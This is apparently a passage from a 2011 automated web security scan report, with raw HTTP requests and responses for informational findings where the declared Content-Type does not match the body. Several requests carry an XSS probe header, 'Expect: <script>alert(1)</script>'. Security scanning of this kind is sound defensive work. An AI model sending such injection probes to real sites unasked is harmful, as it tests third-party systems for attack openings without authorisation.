if (window.top.location=='') aa=1;
docref=document.referrer;
}
catch(er)
{
report_error=1;
docref='none';
}
if (report_err
...[SNIP]...

35.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&64cd0da313&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=64cd0da313__r_id=85dbdb9e09296233a4d7b328928878f8__r_ts=lkjpfk__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; A3=iQQIaFx503Dk00000iKhqaHW208A300001jj9MaH17066N00001iZLfaFB607pd00001j0InaHlY09sO00001j4HbaE.a0a9y00001jGDhaHW50d8900000jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003jGDjaHWf0d8900000hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002jGaZaHWf0d8900004johvaFxN07uh00002h52YaGZy0ca700001hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWe07aw00001jFY.aHqe0d8900001j2VdaGyd07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001jv+zaH1o0d8900002jFZhaHWf0d8900000jAtnaHq602WG00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=9yE10000000000up7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh85Yh0000000001un9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj9yMi0000000000up8Wi10000000001un93M20000000001uf82Np0000000001um9ufH0000000002um99ex0000000001um9yMk0000000000up9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud8Zxy0000000001up9qqo0000000002ui9yDd0000000001un78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh9xwn0000000004up7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000j0InaHlY09sO00001iZLfaFB607pd00001jj9MaH17066N00001iKhqaHW208A300001jGDhaHW50d8900000j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000jGDjaHWf0d8900000gY2paFS+09nl00003hH4jaFhv09wy00001hEIkaItM0bI400001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000jGaZaHWf0d8900004h52YaGZy0ca700001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWe07aw00001jeoLaF6J07Hs00001jFY.aHqe0d8900001j8QYaEBz07LU00001j2VdaGyd07aw00001jv+zaH1o0d8900002hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001jAtnaHq602WG00001jFZhaHWf0d8900000; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9yE10000000000up8Dka0000000001uh9cTR0000000001uf85Yh0000000001un52BU0000000001ui9abz0000000000ui9yMi0000000000up9eB50000000001uj8TfJ0000000001uh9fJa0000000001ul8ny40000000001uq9ufH0000000002um82Np0000000001um93M20000000001uf8Wi10000000001un9yMk0000000000up99ex0000000001um9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9yDd0000000001un9qqo0000000002ui8Zxy0000000001up9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui9xwn0000000004up; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 1831

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

35.3. http://content.pulse360.com/CC4A2528-2176-11DF-BB34-61FFECADD848

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /CC4A2528-2176-11DF-BB34-61FFECADD848

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /CC4A2528-2176-11DF-BB34-61FFECADD848 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:57:35 GMT
Server: Barista/1.1-(eanjbj)
Connection: Close
Content-Length: 8991
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css"> div#p360-hybrid160x600aquabulgeads-CC4A2528-2176-11DF-BB34-61FFECADD848 { width: 160px; left: 0; font-family: sans-serif; position: relative; disp
...[SNIP]...

35.4. http://csrc.nist.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://csrc.nist.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: csrc.nist.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:38 GMT
Server: Apache
Last-Modified: Wed, 03 Oct 2007 13:21:24 GMT
ETag: "20dc404-13e-43b968bd57d00"
Accept-Ranges: bytes
Content-Length: 318
NIST: g3
Content-Type: text/plain

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...

35.5. http://j.maxmind.com/app/geoip.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://j.maxmind.com
Path:   /app/geoip.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /app/geoip.js HTTP/1.1
Host: j.maxmind.com
Proxy-Connection: keep-alive
Referer: http://usjobsresource.com/3/?s=31s-2100u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:06 GMT
Expires: Mon, 02 May 2011 00:03:06 GMT
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 504
X-Req-Start: t=1304292786258231
X-Req-Proc: D=289
Connection: close
X-Pad: avoid browser bug

function geoip_country_code() { return 'US'; }
function geoip_country_name() { return 'United States'; }
function geoip_city() { return 'Dallas'; }
function geoip_region() { return 'TX';
...[SNIP]...

35.6. http://static.pulse360.com/blob/fb/6e141bc3_social_security_card.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.pulse360.com
Path:   /blob/fb/6e141bc3_social_security_card.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /blob/fb/6e141bc3_social_security_card.jpg HTTP/1.1
Host: static.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:22 GMT
Server: Apache
Last-Modified: Fri, 15 Apr 2011 00:00:00 GMT
ETag: "d2ffd-243e-b917a000"
Accept-Ranges: bytes
Content-Length: 9278
Connection: close
Content-Type: image/jpeg

......JFIF.....`.`......Exif..II*..............C....................................................................C.......................................................................K.d.."......
...[SNIP]...

35.7. http://v6test.cdn.att.net/special.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://v6test.cdn.att.net
Path:   /special.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /special.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 19:02:58 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 35
Content-Type: image/jpeg
P3p: policyref="http://www.corp.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
ETag: "2e413718-b-23-4cb7067f"
Last-Modified: Thu, 14 Oct 2010 13:32:47 GMT
Accept-Ranges: bytes
X-Cache: HIT from 12.120.38.40
Cache-Control: max-age=2592000
Age: 16461
X-Cache: HIT from 12.120.79.19
Via: 1.1 12.120.38.40:80 (cache/2.6.2.3.13.ATT), 1.1 12.120.79.19:80 (cache/2.6.2.3.13.ATT)
Connection: keep-alive

GIF87a.............,...........L..;

35.8. http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

Summary

Severity:   Information
Confidence:   Firm
Host:   http://view.atdmt.com
Path:   /jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security] HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:49 GMT
Connection: close
Content-Length: 503

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://ec.atdmt.com/images/pixel.gif','http://na.decdna.net/n/61239/71938/EI6/x/e?value=0&trans=&domain=na
...[SNIP]...

35.9. http://www.92kqrs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.92kqrs.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.92kqrs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 68
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDCSADQTQA=DOHBJHPCELCDEEPCDMDKOFHJ; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021f0d45525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.92kqrs.com:80/favicon.ico

35.10. http://www.ahima.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ahima.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ahima.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:09:36 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.11. http://www.allsup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.allsup.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allsup.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:38:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.12. http://www.babynameshub.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.babynameshub.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.babynameshub.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:24:52 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.13. http://www.benchmade.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.benchmade.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.benchmade.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:11:43 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.14. http://www.calastrology.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.calastrology.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.calastrology.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:33:18 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

35.15. http://www.campingsurvival.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.campingsurvival.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.campingsurvival.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:53:23 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

35.16. http://www.cramster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cramster.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cramster.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:55 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

35.17. http://www.crankyape.com/images/AuctionImages/thumb.26361.1.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.crankyape.com
Path:   /images/AuctionImages/thumb.26361.1.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/AuctionImages/thumb.26361.1.jpg HTTP/1.1
Host: www.crankyape.com
Proxy-Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:26 GMT
Content-Length: 24430
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 16:21:41 GMT
Accept-Ranges: bytes
ETag: "aaa74b5bc05cc1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

.PNG
.
...IHDR...m...R.....^.Z.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..^.IDATx^..ut^........i.PC.8v....v..(Y.d..-FK.X....Y.e..!.4M.N.....s~.R..9I.....q=...#}..w..
...[SNIP]...

35.18. https://www.crankyape.com/images/AuctionImages/thumb.26361.1.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /images/AuctionImages/thumb.26361.1.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/AuctionImages/thumb.26361.1.jpg HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:46 GMT
Content-Length: 24430
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 16:21:41 GMT
Accept-Ranges: bytes
ETag: "aaa74b5bc05cc1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

.PNG
.
...IHDR...m...R.....^.Z.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..^.IDATx^..ut^........i.PC.8v....v..(Y.d..-FK.X....Y.e..!.4M.N.....s~.R..9I.....q=...#}..w..
...[SNIP]...

35.19. https://www.crankyape.com/images/AuctionImages/thumb.26361.2.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /images/AuctionImages/thumb.26361.2.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/AuctionImages/thumb.26361.2.jpg HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:48 GMT
Content-Length: 23780
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 16:21:41 GMT
Accept-Ranges: bytes
ETag: "b8ce525bc05cc1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

.PNG
.
...IHDR...m...R.....^.Z.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..\bIDATx^....\.....e.,[`...h133333.t%]...... ...v..M...B6......I.:..<O=}N..3..WU]]}...}..9/.
...[SNIP]...

35.20. https://www.crankyape.com/images/AuctionImages/thumb.26361.3.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /images/AuctionImages/thumb.26361.3.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/AuctionImages/thumb.26361.3.jpg HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:48 GMT
Content-Length: 25942
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 16:21:42 GMT
Accept-Ranges: bytes
ETag: "7679df5bc05cc1:6f8c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

.PNG
.
...IHDR...m...R.....^.Z.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<..d.IDATx^..ex]g...>..0..'133C..3.e...,..-.b...bfff...1v.03TRI%U5..-EU...>....?..g>k...Xc.1...
...[SNIP]...

35.21. https://www.crankyape.com/images/AuctionImages/thumb.26361.4.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /images/AuctionImages/thumb.26361.4.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/AuctionImages/thumb.26361.4.jpg HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: https://www.crankyape.com/default.asp?pg=DispSingleItem&ItemNumber=26361
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:53:48 GMT
Content-Length: 22479
Content-Type: image/jpeg
Last-Modified: Thu, 28 Apr 2011 16:21:42 GMT
Accept-Ranges: bytes
ETag: "92c7ed5bc05cc1:6f8c"
